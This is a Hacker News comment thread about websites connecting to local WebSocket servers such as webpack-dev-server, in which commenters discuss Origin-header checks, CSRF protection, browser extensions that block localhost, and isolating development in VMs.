That's why I mentioned certificate pinning. I figure you could generate a keypair for WSS communications between the nice programs and then when a nice client tried to connect to a naughty server he would know he had connected to a different host program.


Can't you use CSRF to protect against this?

https://dev.solita.fi/2018/11/07/securing-websocket-endpoint...


If you use uBlock Origin, you can prevent any connections to localhost by default.


interesting, but I do not get it:

"you can", or is it blocked by default?


It's worth noting that secrets rarely live in front-end code, specifically because it's impossible to prevent people from extracting them.


Are there any extensions to block connections to localhost from code on other interfaces or origins?


I was wondering the same: I would be interested in an extension that tells me when a website try to connect to localhost (it should not be hard). Then, once I know it, I would just react myself, as in the cited https://nullsweep.com/why-is-this-website-port-scanning-me/


After ~10 minutes I get: "Connected to 0 servers"

Ahh, feels so good


when I disable websocket with network.websocket.max-connections = 0, then whatsappweb doesn't work, so perhaps someone can develop a related attack here?


Is webpack-dev-server planning on fixing this?


This is why you use VMs with their own network interfaces to do development in


Is the TL;DR here just "webpack-dev server doesn't verify Origin headers for hot reloading?"

Is there a whole group of people that are just learning about Websockets for the first time?




Consider applying for YC's W25 batch! Applications are open till Nov 12.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: